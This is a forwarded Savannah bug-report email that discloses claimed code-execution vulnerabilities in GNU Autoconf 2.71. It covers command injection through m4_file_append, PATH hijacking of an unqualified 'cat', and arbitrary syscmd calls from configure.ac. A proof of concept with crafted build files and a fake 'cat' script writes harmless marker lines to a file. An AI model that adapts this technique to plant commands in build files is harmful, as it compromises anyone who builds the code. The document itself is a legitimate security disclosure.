Please reply via email because it appears that I am unable to access this support item through my account on https://savannah.gnu.org/support/?110961.
---------- Forwarded message --------- From: anonymous <invalid.nore...@gnu.org> Date: Sun, Nov 26, 2023 at 5:16 AM Subject: [sr #110961] 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file To: <allypet...@gmail.com>, <bug-autoconf@gnu.org> URL: <https://savannah.gnu.org/support/?110961> Summary: 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file Group: Autoconf Submitter: None Submitted: Sun 26 Nov 2023 05:16:39 AM UTC Category: None Priority: 5 - Normal Severity: 6 - Security Status: None Privacy: Private Assigned to: None Originator Email: allypet...@gmail.com Open/Closed: Open Discussion Lock: Any Operating System: GNU/Linux _______________________________________________________ Follow-up Comments: ------------------------------------------------------- Date: Sun 26 Nov 2023 05:16:39 AM UTC By: Anonymous = Overview = Arbitrary Code execution can be obtained up running `/usr/bin/autoconf` when a crafted `configure.ac` exploits any of the following 3 vulnerabilities: * Command injection in M4sugar due to lack of input sanitization (CWE-78). * `cat` command being executed without absolute path in M4sugar, leaving it vulnerable to an untrusted PATH (CWE-427). * Invocation of arbitrary m4 macros in `configure.ac`. *Date*: 11/25/2023 *Researcher*: Ally Petitt *Product Tested*: Autoconf v2.71 (it is highly likely this still exists in more recent releases) *Impact*: Remote code execution that leads to the loss of availability, confidentiality, and integrity of the system. In certain cases it can also lead to privilege escalation. = Technical Details = == M4sugar - Multiple Vulnerabilities == The `m4_file_append` macro is defined starting on line 3272 of `lib/m4sugar/m4sugar.m4`. m4_define([m4_file_append], [m4_syscmd([cat >>$1 <<_m4eof $2 _m4eof ]) This macro has 2 vulnerabilities. Proof-of-Concept examples of each will be shown in the "PoC" section to provide both clarification and an easy way to validate the issues. 1. The first vulnerability is that `cat` is called without an absolute path, leaving it prone to modification of the $PATH environmental variable. A privileged user on the system may set the $PATH to point to a directory they control containing a malicious executable called `cat`. In scenarios where `autoconf` has an SUID bit set or can otherwise be run with elevated privileges, this can lead to privilege escalation. *Mitigation*: Replace "cat" with "/usr/bin/cat" in the definition of `m4_file_append`. 2. The arguments passed to `m4_file_append` are not sanitized before being passed into `m4_syscmd`. This means that hackers can directly insert malicious code as an argument to the macro and it will be executed when `autoconf` is ran! *Mitigation*: If possible, implement a more secure way to append to a file that does not involve running shell commands. I wish I could provide more guidance here but I am not very proficient in m4. In the case that this is not feasible, treat `$1` and `$2` as untrusted input and sanitize them. == Autoconf - Invocation of Arbitrary M4 Macros == Autoconf appears to execute m4 macros directly through the `configure.ac` file. Without any sanitization, adversaries are able invoke arbitrary macros including `syscmd` and the aforementioned vulnerable `m4_file_append`. This can lead to the execution of code upon running `autoconf`. An example will be shown in the "PoC" section below. It is worth noting that while executing macros is part of Autoconf's functionality, I did not find evidence that the arbitrary execution of commands was an intentional part of this design. As such, the lack of restriction on the macros that can be called results in a larger attack surface that can be taken advantage of by hackers. *Mitigation*: Enforce a whitelist of macros that are able to be executed from `configure.ac`. = PoC = This Proof-of-Concept involves the creation of 4 files within the same directory. The contents of these files are the following (file names are commented at the top of each code block): # congfigure.ac AC_INIT([hello], [1.0]) AC_CONFIG_SRCDIR([hello.c]) AC_CONFIG_AUX_DIR([build-aux]) AC_PROG_CC # Trigger the vulnerabilities by writing to a file called `vulns` syscmd(echo vuln1 > vulns) # vuln1 m4_file_append(test, `echo vuln2 >> vulns`) # vuln2 and vuln3 AC_CONFIG_FILES([Makefile]) AC_OUTPUT # Makefile.am bin_PROGRAMS = hello hello_SOURCES = hello.c # hello.c #include <stdio.h> int main(int argc, char** argv) { printf("hello world!\n"); return 0; } # cat #!/bin/bash echo vuln3 >> vulns The resulting directory listing should be the following: $ ls cat configure.ac hello.c Makefile.am Once the files are verified to be correct, the 3 vulnerabilities can be exploited by running the command below. $ export PATH=$(pwd):$PATH && autoconf A new file will be created called `vulns`. Each vulnerability that was exploited wrote to this file to create the content below. vuln1 vuln2 vuln3 Note that exploiting vulnerabilities 1 and 2 (the vulnerabilities that write "vuln1" and "vuln2" to the `vulns` file, respectively) does not require the $PATH environmental variable to be set and can simply be exploited with the below command. $ autoconf --force These files are also included as a zip archive attached with this bug report. _______________________________________________________ File Attachments: ------------------------------------------------------- Date: Sun 26 Nov 2023 05:16:39 AM UTC Name: poc.zip Size: 1KiB By: None <http://savannah.gnu.org/support/download.php?file_id=55355> _______________________________________________________ Reply to this item at: <https://savannah.gnu.org/support/?110961> _______________________________________________ Message sent via Savannah https://savannah.gnu.org/